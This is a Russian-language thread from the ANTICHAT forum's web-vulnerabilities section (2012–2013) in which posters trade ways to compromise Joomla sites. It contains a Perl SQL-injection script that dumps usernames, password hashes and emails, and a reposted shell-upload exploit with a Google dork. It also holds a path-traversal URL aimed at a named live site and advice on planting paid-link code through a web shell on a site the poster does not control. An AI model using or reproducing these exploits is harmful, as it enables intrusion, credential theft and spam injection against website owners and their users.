HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #271  
Старый 25.12.2012, 14:01
iskus
Guest
Сообщений: n/a
Провел на форуме:
196

Репутация: 0
По умолчанию

TinyMCE TinyBrowser addon multiple vulnerabilities

Салют, парни, кому-то удалось использовать эту уязвимость для заливки шелла? Может натолкнете на мысль верную, как обойти Restricted access

http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities

Спасибо за помощь.
 
Ответить с цитированием

  #272  
Старый 25.12.2012, 23:49
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

Цитата:
Сообщение от iskus  
iskus said:
Салют, парни, кому-то удалось использовать эту уязвимость для заливки шелла? Может натолкнете на мысль верную, как обойти
Restricted access
http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities
Спасибо за помощь.
Данная бага актуальна для joomla 1.5.12, которая сейчас практически не встречается и как вы ее собрались использовать я не понимаю.

В joomla заливайте шелл через модули/шаблоны, собственно как и в других CMS...
 
Ответить с цитированием

  #273  
Старый 10.01.2013, 20:19
xaknem
Новичок
Регистрация: 12.02.2008
Сообщений: 1
Провел на форуме:
16606

Репутация: 0
По умолчанию

Подскажите пожалуйста, залит шелл на сайт под управлением Joomla (доступа в админку нет), подскажите можно ли в какой либо модуль воткнуть код системы sape ?

Дело в том что стоят права только на чтение в папке шаблона, и стандартным способом не удается установить sape

На модули выставлены права разрешающие редактирование

Также в папке шаблона залит мой php файл который я могу редактировать (на него выставлены права)

Заранее благодарен
 
Ответить с цитированием

  #274  
Старый 10.01.2013, 22:03
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от xaknem  
xaknem said:
Подскажите пожалуйста, залит шелл на сайт под управлением Joomla (доступа в админку нет), подскажите можно ли в какой либо модуль воткнуть код системы sape ?
Дело в том что стоят права только на чтение в папке шаблона, и стандартным способом не удается установить sape
На модули выставлены права разрешающие редактирование
Также в папке шаблона залит мой php файл который я могу редактировать (на него выставлены права)
Заранее благодарен
Если есть возможность заливать в папку шаблона, то попробуй сначало скапировать к себе шаблон, орегинал удалить, а потом перезалить его, по идее должны стать права на правку, но естественно если сама папка в каторой находится шаблон с полными правами...
 
Ответить с цитированием

  #275  
Старый 11.01.2013, 00:03
xaknem
Новичок
Регистрация: 12.02.2008
Сообщений: 1
Провел на форуме:
16606

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:
Если есть возможность заливать в папку шаблона, то попробуй сначало скапировать к себе шаблон, орегинал удалить, а потом перезалить его, по идее должны стать права на правку, но естественно если сама папка в каторой находится шаблон с полными правами...
права на правку только в одном файле который лежит в папке с шаблоном, могу редактировать только его

еще права на редактирование на папки модулей
 
Ответить с цитированием

  #276  
Старый 12.01.2013, 22:27
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

PHP-iclude: com_jomholiday

Цитата:
Сообщение от None  
http://jomholiday.comdev.eu/component/jomholiday/index.php?option=com_jomholiday&task=item&id=80%27 d&layout=writeareview/../../../../../../../../../../../../../../../../../../../home/jomholiday/public_html/index
залиться пока не получилось, как зальюсь приведу пример уязвимого кода.
 
Ответить с цитированием

  #277  
Старый 19.01.2013, 19:49
infoseller
Guest
Сообщений: n/a
Провел на форуме:
49472

Репутация: 0
По умолчанию

Код:
Code:
# Exploit Title:Joomla com_collecter shell upload 
# Author: Red Dragon_al (Alb0zZ Team) 
# Home :HackForums.AL,alb0zz.in 
# Date :19/01/2013   
# Category:: web apps 
# Google dork: [inurl:index.php?option=com_collector] 
# Tested on: Windows XP   
# Download: http://www.steevo.fr/en/download 
# Home Page: http://www.steevo.fr/   --------------------------------------- #      ~ Expl0itation ~      
# ---------------------------------------   
1- Google dork: [inurl:index.php?option=com_collector]   
2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   
3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   upload ur shell as : shell.php                                                  
# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.   #2013
http://www.exploit-db.com/exploits/24228/
 
Ответить с цитированием

  #278  
Старый 19.01.2013, 23:03
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от infoseller  
infoseller said:
Код:
Code:
# Exploit Title:Joomla com_collecter shell upload 
# Author: Red Dragon_al (Alb0zZ Team) 
# Home :HackForums.AL,alb0zz.in 
# Date :19/01/2013   
# Category:: web apps 
# Google dork: [inurl:index.php?option=com_collector] 
# Tested on: Windows XP   
# Download: http://www.steevo.fr/en/download 
# Home Page: http://www.steevo.fr/   --------------------------------------- #      ~ Expl0itation ~      
# ---------------------------------------   
1- Google dork: [inurl:index.php?option=com_collector]   
2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   
3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   upload ur shell as : shell.php                                                  
# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.   #2013
http://www.exploit-db.com/exploits/24228/
P.S: копировать не стоит сплоиты с других ресурсов, если копи пастите, то лудше с раскрытием уязвимого года не болие...
 
Ответить с цитированием

  #279  
Старый 22.01.2013, 20:34
uCryNet
Guest
Сообщений: n/a
Провел на форуме:
20351

Репутация: 5
По умолчанию

exploit [joomla]

Test screen [http://data.imagup.com/10/1171476626.png] [http://168.63.206.26/test2.png]

3xpl01t c0d3 :

Код:
Code:
Dork (N/A) "inurl:option=com_huruhelpdesk" or "inurl:/index.php?option=com_huruhelpdesk&view=detail"
author : *devil-zone.net
greet is to : devil-zone.net *all members 
vel = sqlI
S1mPl3 P3rL 3xpl01t3r

Код:
Code:
#!/usr/bin/perl
#greet is to Evil-Dz
system("clear");
print "***************************************\n";
print " * * * * Good Luck & Hafe Fun * * * * *\n";
print " * * * Coded by devil-zone forum * * **\n"; 
print "***************************************\n\n";
use LWP::UserAgent;
print "Target page [ex: HosT] --> ";
chomp(my $target= );
$column_name="concat(username,0x3a,password,0x3a,mail)";
$table_name="jos_users";
$prm="-1/**/union/**/select/**/";
$start= LWP::UserAgent->new() or die "[!] Error while processing";
$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
$website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";
$ok= $start->request(HTTP::Request->new(GET=>$website));
$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found :(\n";
}
 
Ответить с цитированием

  #280  
Старый 01.02.2013, 01:29
rik
Guest
Сообщений: n/a
Провел на форуме:
229

Репутация: 0
По умолчанию

Цитата:
Сообщение от infoseller  
infoseller said:
Код:
Code:
# Exploit Title:Joomla com_collecter shell upload 
# Author: Red Dragon_al (Alb0zZ Team) 
# Home :HackForums.AL,alb0zz.in 
# Date :19/01/2013   
# Category:: web apps 
# Google dork: [inurl:index.php?option=com_collector] 
# Tested on: Windows XP   
# Download: http://www.steevo.fr/en/download 
# Home Page: http://www.steevo.fr/   --------------------------------------- #      ~ Expl0itation ~      
# ---------------------------------------   
1- Google dork: [inurl:index.php?option=com_collector]   
2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   
3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   upload ur shell as : shell.php                                                  
# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.   #2013
http://www.exploit-db.com/exploits/24228/
подскажите пожалуйста, как туда залить шелл? выбрать файл, даёт. а кнопка на загрузку не активна.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ